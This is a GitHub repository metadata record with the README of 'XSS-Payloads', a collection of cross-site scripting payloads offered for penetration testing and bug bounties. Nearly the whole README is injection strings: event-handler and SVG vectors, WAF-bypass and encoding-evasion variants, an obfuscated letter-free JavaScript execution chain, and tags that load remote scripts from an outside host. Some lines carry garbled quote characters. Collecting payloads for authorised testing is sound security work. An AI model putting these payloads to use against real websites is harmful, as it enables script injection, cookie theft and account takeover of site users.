{"id":24342205,"url":"https://github.com/ihebski/XSS-Payloads","last_synced_at":"2025-09-28T03:31:37.040Z","repository":{"id":39966528,"uuid":"160079999","full_name":"ihebski/XSS-Payloads","owner":"ihebski","description":"Collection of XSS Payloads for fun and profit","archived":false,"fork":false,"pushed_at":"2020-08-14T12:19:14.000Z","size":96,"stargazers_count":172,"open_issues_count":0,"forks_count":60,"subscribers_count":10,"default_branch":"master","last_synced_at":"2025-01-18T08:04:11.844Z","etag":null,"topics":["bugbounty","bughunter","javascript","payloads","pentesting","xss-exploitation","xss-payloads"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ihebski.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-12-02T19:06:25.000Z","updated_at":"2025-01-16T10:20:51.000Z","dependencies_parsed_at":"2022-08-09T15:36:48.819Z","dependency_job_id":null,"html_url":"https://github.com/ihebski/XSS-Payloads","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ihebski/XSS-Payloads","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ihebski%2FXSS-Payloads","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ihebski%2FXSS-Payloads/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ihebski%2FXSS-Payloads/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ihebski%2FXSS-Payloads/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ihebski","download_url":"https://codeload.github.com/ihebski/XSS-Payloads/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ihebski%2FXSS-Payloads/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":277321332,"owners_count":25798664,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-28T02:00:08.834Z","response_time":79,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","bughunter","javascript","payloads","pentesting","xss-exploitation","xss-payloads"],"created_at":"2025-01-18T08:01:29.765Z","updated_at":"2025-09-28T03:31:32.031Z","avatar_url":"https://github.com/ihebski.png","language":null,"funding_links":[],"categories":["LLM分析过程"],"sub_categories":[],"readme":"# XSS-Payloads\nXSS Payloads collection for testing web application during an engagement \n\n## Payloads for 2020 - Some updates\nExtracted from https://netsec.expert/2020/02/01/xss-in-2020.html (Awesome work)\n\n*SVG*\n```javascript\n\u003csvg/onload=alert(1)\u003e\u003csvg\u003e\n\u003csvg\nonload=alert(1)\u003e\u003csvg\u003e # newline char\n\u003csvg\tonload=alert(1)\u003e\u003csvg\u003e # tab char\n\u003csvg\fonload=alert(1)\u003e\u003csvg\u003e # new page char (0xc)\n```\n*Standard HTML events*\n```javascript\n\u003cbody onload=alert()\u003e\n\u003cimg src=x onerror=alert()\u003e\n\u003csvg onload=alert()\u003e\n\u003cbody onpageshow=alert(1)\u003e\n\u003cdiv style=\"width:1000px;height:1000px\" onmouseover=alert()\u003e\u003c/div\u003e\n\u003cmarquee width=10 loop=2 behavior=\"alternate\" onbounce=alert()\u003e (firefox only)\n\u003cmarquee onstart=alert(1)\u003e (firefox only)\n\u003cmarquee loop=1 width=0 onfinish=alert(1)\u003e (firefox only)\n\u003cinput autofocus=\"\" onfocus=alert(1)\u003e\u003c/input\u003e\n\u003cdetails open ontoggle=\"alert()\"\u003e  (chrome \u0026 opera only)\n```\n*Standard HTML events - Video load*\n```javascript\n\u003cvideo autoplay onloadstart=\"alert()\" src=x\u003e\u003c/video\u003e\n\u003cvideo autoplay controls onplay=\"alert()\"\u003e\u003csource src=\"http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4\"\u003e\u003c/video\u003e\n\u003cvideo controls onloadeddata=\"alert()\"\u003e\u003csource src=\"http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4\"\u003e\u003c/video\u003e\n\u003cvideo controls onloadedmetadata=\"alert()\"\u003e\u003csource src=\"http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4\"\u003e\u003c/video\u003e\n\u003cvideo controls onloadstart=\"alert()\"\u003e\u003csource src=\"http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4\"\u003e\u003c/video\u003e\n\u003cvideo controls onloadstart=\"alert()\"\u003e\u003csource src=x\u003e\u003c/video\u003e\n\u003cvideo controls oncanplay=\"alert()\"\u003e\u003csource src=\"http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4\"\u003e\u003c/video\u003e\n\u003caudio autoplay controls onplay=\"alert()\"\u003e\u003csource src=\"http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4\"\u003e\u003c/audio\u003e\n\u003caudio autoplay controls onplaying=\"alert()\"\u003e\u003csource src=\"http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4\"\u003e\u003c/audio\u003e\n```\n*CSS-based events*\n```javascript\n\u003cstyle\u003e@keyframes x {}\u003c/style\u003e\n\u003cp style=\"animation: x;\" onanimationstart=\"alert()\"\u003eXSS\u003c/p\u003e\n\u003cp style=\"animation: x;\" onanimationend=\"alert()\"\u003eXSS\u003c/p\u003e\n```\n*Weird XSS vectors*\n```javascript\n\u003csvg\u003e\u003canimate onbegin=alert() attributeName=x\u003e\u003c/svg\u003e\n\u003cobject data=\"data:text/html,\u003cscript\u003ealert(5)\u003c/script\u003e\"\u003e\n\u003ciframe srcdoc=\"\u003csvg onload=alert(4);\u003e\"\u003e\n\u003cobject data=javascript:alert(3)\u003e\n\u003ciframe src=javascript:alert(2)\u003e\n\u003cembed src=javascript:alert(1)\u003e\n\u003cembed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"\u003e\u003c/embed\u003e\n\u003cembed src=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"\u003e\u003c/embed\u003e\n```\n\n\n---\n```javascript\nBy MrPapercut \n/**\n* JS without english, slash, plus or minus\n* (as extra challenge: no numbers or different-language characters either)\n\n* First we need a few numbers\n0: []\u003c\u003c[]\n1: !!{}\u003c\u003c![]\n2: !!{}\u003c\u003c!![]\n3: (!![]\u003c\u003c!![])|!![]\n4: !![]\u003c\u003c!![]\u003c\u003c!![]\n5: !![]\u003c\u003c!![]\u003c\u003c!![]|!![]\n6: !![]\u003c\u003c!![]\u003c\u003c!![]|!!{}\u003c\u003c!![]\n14: !![]\u003c\u003c!![]\u003c\u003c!![]|!!{}\u003c\u003c!![]\n\n* Next we need a few basic strings\nfalse: `${!![][~[]]}`\ntrue: `${![][~[]]}`\n[object Object]: `${{}}`\nundefined: `${[][~[]]}`\n\n* Now we can build the string 'constructor'\n{\nc: `${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]],\no: `${{}}`[!!{}\u003c\u003c![]],\nn: `${[][~[]]}`[!!{}\u003c\u003c![]],\ns: `${!![][~[]]}`[(!![]\u003c\u003c!![])|!![]],\nt: `${![][~[]]}`[!{}\u003c\u003c![]],\nr: `${![][~[]]}`[!!{}\u003c\u003c![]],\nu: `${![][~[]]}`[!!{}\u003c\u003c!![]],\nc: `${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]],\nt: `${![][~[]]}`[!{}\u003c\u003c![]],\no: `${{}}`[!!{}\u003c\u003c![]],\nr: `${![][~[]]}`[!!{}\u003c\u003c![]]\n}\n\n* With 'constructor', we can create a function, like so:\n[]['constructor']['constructor']('javascript code')()\n\n* As JS code, we will run 'console.log(\"obfuscation!\")'\n* For a reason I can't be bothered about, it's easier to create 2 separate strings: \"console['log']()\" and \"obfuscation!\"\nc ${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}\no ${`${{}}`[!!{}\u003c\u003c![]]}\nn ${`${[][~[]]}`[!!{}\u003c\u003c![]]}\ns ${`${!![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}\no ${`${{}}`[!!{}\u003c\u003c![]]}\nl ${`${!![][~[]]}`[!!{}\u003c\u003c!![]]}\ne ${`${![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}\n[ ${`${{}}`[[]\u003c\u003c[]]}\n'\nl ${`${!![][~[]]}`[!!{}\u003c\u003c!![]]}\no ${`${{}}`[!!{}\u003c\u003c![]]}\ng ${`${``[_]}`[!![]\u003c\u003c!![]\u003c\u003c!![]\u003c\u003c!![]^!![]\u003c\u003c!![]\u003c\u003c!![]|!!{}\u003c\u003c!![]]}\n'\n] ${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]\u003c\u003c!![]^!![]\u003c\u003c!![]\u003c\u003c!![]|!!{}\u003c\u003c!![]]}\n\n\no: `${{}}`[!!{}\u003c\u003c![]]\nb: `${{}}`[!!{}\u003c\u003c!![]]\nf: `${!![][~[]]}`[[]\u003c\u003c[]]\nu: `${![][~[]]}`[!!{}\u003c\u003c!![]]\ns: `${!![][~[]]}`[(!![]\u003c\u003c!![])|!![]]\nc: `${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]\na: `${!![][~[]]}`[!!{}\u003c\u003c![]]\nt: `${![][~[]]}`[!{}\u003c\u003c![]]\ni: `${[][~[]]}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]\no: `${{}}`[!!{}\u003c\u003c![]]\nn: `${[][~[]]}`[!!{}\u003c\u003c![]]\n\n// Assign 'constructor' to _\n_=`${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${[][~[]]}`[!!{}\u003c\u003c![]]}${`${!![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}${`${![][~[]]}`[!{}\u003c\u003c![]]}${`${![][~[]]}`[!!{}\u003c\u003c![]]}${`${![][~[]]}`[!!{}\u003c\u003c!![]]}${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${![][~[]]}`[!{}\u003c\u003c![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${![][~[]]}`[!!{}\u003c\u003c![]]}`;\n\n// Assign 'obfuscation!' to __\n__=`${`${{}}`[!!{}\u003c\u003c![]]}${`${{}}`[!!{}\u003c\u003c!![]]}${`${!![][~[]]}`[[]\u003c\u003c[]]}${`${![][~[]]}`[!!{}\u003c\u003c!![]]}${`${!![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${!![][~[]]}`[!!{}\u003c\u003c![]]}${`${![][~[]]}`[!{}\u003c\u003c![]]}${`${[][~[]]}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${[][~[]]}`[!!{}\u003c\u003c![]]}!`;\n\n// Execute\n[][_][_](\n`${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${[][~[]]}`[!!{}\u003c\u003c![]]}${`${!![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${!![][~[]]}`[!!{}\u003c\u003c!![]]}${`${![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}${`${{}}`[[]\u003c\u003c[]]}'${`${!![][~[]]}`[!!{}\u003c\u003c!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${``[_]}`[!![]\u003c\u003c!![]\u003c\u003c!![]\u003c\u003c!![]^!![]\u003c\u003c!![]\u003c\u003c!![]|!!{}\u003c\u003c!![]]}'${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]\u003c\u003c!![]^!![]\u003c\u003c!![]\u003c\u003c!![]|!!{}\u003c\u003c!![]]}(__)`\n)()\n\n// All together now:\n*/\n_=`${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${[][~[]]}`[!!{}\u003c\u003c![]]}${`${!![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}${`${![][~[]]}`[!{}\u003c\u003c![]]}${`${![][~[]]}`[!!{}\u003c\u003c![]]}${`${![][~[]]}`[!!{}\u003c\u003c!![]]}${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${![][~[]]}`[!{}\u003c\u003c![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${![][~[]]}`[!!{}\u003c\u003c![]]}`,__=`${`${{}}`[!!{}\u003c\u003c![]]}${`${{}}`[!!{}\u003c\u003c!![]]}${`${!![][~[]]}`[[]\u003c\u003c[]]}${`${![][~[]]}`[!!{}\u003c\u003c!![]]}${`${!![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${!![][~[]]}`[!!{}\u003c\u003c![]]}${`${![][~[]]}`[!{}\u003c\u003c![]]}${`${[][~[]]}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${[][~[]]}`[!!{}\u003c\u003c![]]}!`,[][_][_](`${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]|!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${[][~[]]}`[!!{}\u003c\u003c![]]}${`${!![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${!![][~[]]}`[!!{}\u003c\u003c!![]]}${`${![][~[]]}`[(!![]\u003c\u003c!![])|!![]]}${`${{}}`[[]\u003c\u003c[]]}'${`${!![][~[]]}`[!!{}\u003c\u003c!![]]}${`${{}}`[!!{}\u003c\u003c![]]}${`${``[_]}`[!![]\u003c\u003c!![]\u003c\u003c!![]\u003c\u003c!![]^!![]\u003c\u003c!![]\u003c\u003c!![]|!!{}\u003c\u003c!![]]}'${`${{}}`[!![]\u003c\u003c!![]\u003c\u003c!![]\u003c\u003c!![]^!![]\u003c\u003c!![]\u003c\u003c!![]|!!{}\u003c\u003c!![]]}(__)`)()\n\n```\n\n\n\n\u003cb\u003eBypass WAF \u003c/b\u003e\n```javascript\n\u003c/script\u003e\u003csvg\u003e\u003cscript\u003ealert(1)-%26apos%3B\nanythinglr00\u003c/script\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003euxldz\n\nanythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz\n\u003cobject data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='\u003e\u003c/object\u003e\n\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x\u003e\n\u003ca href=javas\u0026#99;ript:alert(1)\u003e\n```\n\n\u003cb\u003ePayloads\u003c/b\u003e\n```javascript\n\u003cscript\u003ealert(123);\u003c/script\u003e\n\u003cScRipT\u003ealert(\"XSS\");\u003c/ScRipT\u003e\n\u003cscript\u003ealert(123)\u003c/script\u003e\n\u003cscript\u003ealert(\"hellox worldss\");\u003c/script\u003e\n\u003cscript\u003ealert(�XSS�)\u003c/script\u003e \n\u003cscript\u003ealert(�XSS�);\u003c/script\u003e\n\u003cscript\u003ealert(�XSS�)\u003c/script\u003e\n�\u003e\u003cscript\u003ealert(�XSS�)\u003c/script\u003e\n\u003cscript\u003ealert(/XSS�)\u003c/script\u003e\n\u003cscript\u003ealert(/XSS/)\u003c/script\u003e\n\u003c/script\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n�; alert(1);\n�)alert(1);//\n\u003cScRiPt\u003ealert(1)\u003c/sCriPt\u003e\n\u003cIMG SRC=jAVasCrIPt:alert(�XSS�)\u003e\n\u003cIMG SRC=�javascript:alert(�XSS�);�\u003e\n\u003cIMG SRC=javascript:alert(\u0026quot;XSS\u0026quot;)\u003e\n\u003cIMG SRC=javascript:alert(�XSS�)\u003e      \n\u003cimg src=xss onerror=alert(1)\u003e\n\n\n\u003ciframe %00 src=\"\u0026Tab;javascript:prompt(1)\u0026Tab;\"%00\u003e\n\n\u003csvg\u003e\u003cstyle\u003e{font-family\u0026colon;'\u003ciframe/onload=confirm(1)\u003e'\n\n\u003cinput/onmouseover=\"javaSCRIPT\u0026colon;confirm\u0026lpar;1\u0026rpar;\"\n\n\u003csVg\u003e\u003cscRipt %00\u003ealert\u0026lpar;1\u0026rpar; {Opera}\n\n\u003cimg/src=`%00` onerror=this.onerror=confirm(1)\n\n\u003cform\u003e\u003cisindex formaction=\"javascript\u0026colon;confirm(1)\"\n\n\u003cimg src=`%00`\u0026NewLine; onerror=alert(1)\u0026NewLine;\n\n\u003cscript/\u0026Tab; src='https://dl.dropbox.com/u/13018058/js.js' /\u0026Tab;\u003e\u003c/script\u003e\n\n\u003cScRipT 5-0*3+9/3=\u003eprompt(1)\u003c/ScRipT giveanswerhere=?\n\n\u003ciframe/src=\"data:text/html;\u0026Tab;base64\u0026Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\"\u003e\n\n\u003cscript /*%00*/\u003e/*%00*/alert(1)/*%00*/\u003c/script /*%00*/\n\n\u0026#34;\u0026#62;\u003ch1/onmouseover='\\u0061lert(1)'\u003e%00\n\n\u003ciframe/src=\"data:text/html,\u003csvg \u0026#111;\u0026#110;load=alert(1)\u003e\"\u003e\n\n\u003cmeta content=\"\u0026NewLine; 1 \u0026NewLine;; JAVASCRIPT\u0026colon; alert(1)\" http-equiv=\"refresh\"/\u003e\n\n\u003csvg\u003e\u003cscript xlink:href=data\u0026colon;,window.open('https://www.google.com/')\u003e\u003c/script\n\n\u003csvg\u003e\u003cscript x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}\n\n\u003cmeta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\"\u003e\n\u003ciframe src=javascript\u0026colon;alert\u0026lpar;document\u0026period;location\u0026rpar;\u003e\n\n\u003cform\u003e\u003ca href=\"javascript:\\u0061lert\u0026#x28;1\u0026#x29;\"\u003eX\n\n\u003c/script\u003e\u003cimg/*%00/src=\"worksinchrome\u0026colon;prompt\u0026#x28;1\u0026#x29;\"/%00*/onerror='eval(src)'\u003e\n\u003cimg/\u0026#09;\u0026#10;\u0026#11; src=`~` onerror=prompt(1)\u003e\n\u003cform\u003e\u003ciframe \u0026#09;\u0026#10;\u0026#11; src=\"javascript\u0026#58;alert(1)\"\u0026#11;\u0026#10;\u0026#09;;\u003e\n\n\u003ca href=\"data:application/x-x509-user-cert;\u0026NewLine;base64\u0026NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u0026#09;\u0026#10;\u0026#11;\u003eX\u003c/a\n\nhttp://www.google\u003cscript .com\u003ealert(document.location)\u003c/script\n\n\u003ca\u0026#32;href\u0026#61;\u0026#91;\u0026#00;\u0026#93;\"\u0026#00; onmouseover=prompt\u0026#40;1\u0026#41;\u0026#47;\u0026#47;\"\u003eXYZ\u003c/a\n\n\u003cimg/src=@\u0026#32;\u0026#13; onerror = prompt('\u0026#49;')\n\n\u003cstyle/onload=prompt\u0026#40;'\u0026#88;\u0026#83;\u0026#83;'\u0026#41;\n\n\u003cscript ^__^\u003ealert(String.fromCharCode(49))\u003c/script ^__^\n\n\u003c/style \u0026#32;\u003e\u003cscript \u0026#32; :-(\u003e/**/alert(document.location)/**/\u003c/script \u0026#32; :-(\n\n\u0026#00;\u003c/form\u003e\u003cinput type\u0026#61;\"date\" onfocus=\"alert(1)\"\u003e\n\n\u003cform\u003e\u003ctextarea \u0026#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074\u0026#x28;1\u0026#x29;'\u003e\n\n\u003cscript /***/\u003e/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/\u003c/script /***/\n\n\u003ciframe srcdoc='\u0026lt;body onload=prompt\u0026lpar;1\u0026rpar;\u0026gt;'\u003e\n\n\u003ca href=\"javascript:void(0)\" onmouseover=\u0026NewLine;javascript:alert(1)\u0026NewLine;\u003eX\u003c/a\u003e\n\n\u003cscript ~~~\u003ealert(0%0)\u003c/script ~~~\u003e\n\n\u003cstyle/onload=\u0026lt;!--\u0026#09;\u0026gt;\u0026#10;alert\u0026#10;\u0026lpar;1\u0026rpar;\u003e\n\n\u003c///style///\u003e\u003cspan %2F onmousemove='alert\u0026lpar;1\u0026rpar;'\u003eSPAN\n\n\u003cimg/src='http://i.imgur.com/P8mL8.jpg' onmouseover=\u0026Tab;prompt(1)\n\n\u0026#34;\u0026#62;\u003csvg\u003e\u003cstyle\u003e{-o-link-source\u0026colon;'\u003cbody/onload=confirm(1)\u003e'\n\n\u0026#13;\u003cblink/\u0026#13; onmouseover=pr\u0026#x6F;mp\u0026#116;(1)\u003eOnMouseOver {Firefox \u0026 Opera}\n\n\u003cmarquee onstart='javascript:alert\u0026#x28;1\u0026#x29;'\u003e^__^\n\n\u003cdiv/style=\"width:expression(confirm(1))\"\u003eX\u003c/div\u003e {IE7}\n\n\u003ciframe/%00/ src=javaSCRIPT\u0026colon;alert(1)\n\n//\u003cform/action=javascript\u0026#x3A;alert\u0026lpar;document\u0026period;cookie\u0026rpar;\u003e\u003cinput/type='submit'\u003e//\n\n/*iframe/src*/\u003ciframe/src=\"\u003ciframe/src=@\"/onload=prompt(1) /*iframe/src*/\u003e\n\n//|\\\\ \u003cscript //|\\\\ src='https://dl.dropbox.com/u/13018058/js.js'\u003e //|\\\\ \u003c/script //|\\\\\n\n\u003c/font\u003e/\u003csvg\u003e\u003cstyle\u003e{src\u0026#x3A;'\u003cstyle/onload=this.onload=confirm(1)\u003e'\u003c/font\u003e/\u003c/style\u003e\n\n\u003ca/href=\"javascript:\u0026#13; javascript:prompt(1)\"\u003e\u003cinput type=\"X\"\u003e\n\n\u003c/plaintext\\\u003e\u003c/|\\\u003e\u003cplaintext/onmouseover=prompt(1)\n\n\u003c/svg\u003e''\u003csvg\u003e\u003cscript 'AQuickBrownFoxJumpsOverTheLazyDog'\u003ealert\u0026#x28;1\u0026#x29; {Opera}\n\n\u003ca href=\"javascript\u0026colon;\\u0061\u0026#x6C;\u0026#101%72t\u0026lpar;1\u0026rpar;\"\u003e\u003cbutton\u003e\n\n\u003cdiv onmouseover='alert\u0026lpar;1\u0026rpar;'\u003eDIV\u003c/div\u003e\n\n\u003ciframe style=\"xg-p:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\"\u003e\n\n\u003ca href=\"jAvAsCrIpT\u0026colon;alert\u0026lpar;1\u0026rpar;\"\u003eX\u003c/a\u003e\n\n\u003cembed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"\u003e\n\n\u003cobject data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"\u003e\n\n\u003cvar onmouseover=\"prompt(1)\"\u003eOn Mouse Over\u003c/var\u003e\n\n\u003ca href=javascript\u0026colon;alert\u0026lpar;document\u0026period;cookie\u0026rpar;\u003eClick Here\u003c/a\u003e\n\n\u003cimg src=\"/\" =_=\" title=\"onerror='prompt(1)'\"\u003e\n\n\u003c%\u003c!--'%\u003e\u003cscript\u003ealert(1);\u003c/script --\u003e\n\n\u003cscript src=\"data:text/javascript,alert(1)\"\u003e\u003c/script\u003e\n\u003ciframe/src \\/\\/onload = prompt(1)\n\n\u003ciframe/onreadystatechange=alert(1)\n\n\u003csvg/onload=alert(1)\n\n\u003cinput value=\u003c\u003e\u003ciframe/src=javascript:confirm(1)\n\n\u003cinput type=\"text\" value=`` \u003cdiv/onmouseover='alert(1)'\u003eX\u003c/div\u003e\n\nhttp://www.\u003cscript\u003ealert(1)\u003c/script .com\n\n\u003ciframe src=j\u0026NewLine;\u0026Tab;a\u0026NewLine;\u0026Tab;\u0026Tab;v\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;a\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;s\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;c\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;r\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;i\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;p\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;t\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026colon;a\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;l\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;e\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;r\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;t\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;28\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;1\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;%29\u003e\u003c/iframe\u003e\n\n\u003csvg\u003e\u003cscript ?\u003ealert(1)\n\n\u003ciframe src=j\u0026Tab;a\u0026Tab;v\u0026Tab;a\u0026Tab;s\u0026Tab;c\u0026Tab;r\u0026Tab;i\u0026Tab;p\u0026Tab;t\u0026Tab;:a\u0026Tab;l\u0026Tab;e\u0026Tab;r\u0026Tab;t\u0026Tab;%28\u0026Tab;1\u0026Tab;%29\u003e\u003c/iframe\u003e\n\n\u003cimg src=`xx:xx`onerror=alert(1)\u003e\n\n\u003cmeta http-equiv=\"refresh\" content=\"0;javascript\u0026colon;alert(1)\"/\u003e\n\u003cmath\u003e\u003ca xlink:href=\"//jsfiddle.net/t846h/\"\u003eclick\n\n\u003cembed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always\u003e\n\u003csvg contentScriptType=text/vbs\u003e\u003cscript\u003eMsgBox+1\n\n\u003ca href=\"data:text/html;base64_,\u003csvg/onload=\\u0061\u0026#x6C;\u0026#101%72t(1)\u003e\"\u003eX\u003c/a\n\n\u003ciframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE\u003e\n\n\u003cscript\u003e~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')\u003c/script U+\n\n\u003cscript/src=\"data\u0026colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"\u003e\u003c/script a=\\u0061 \u0026 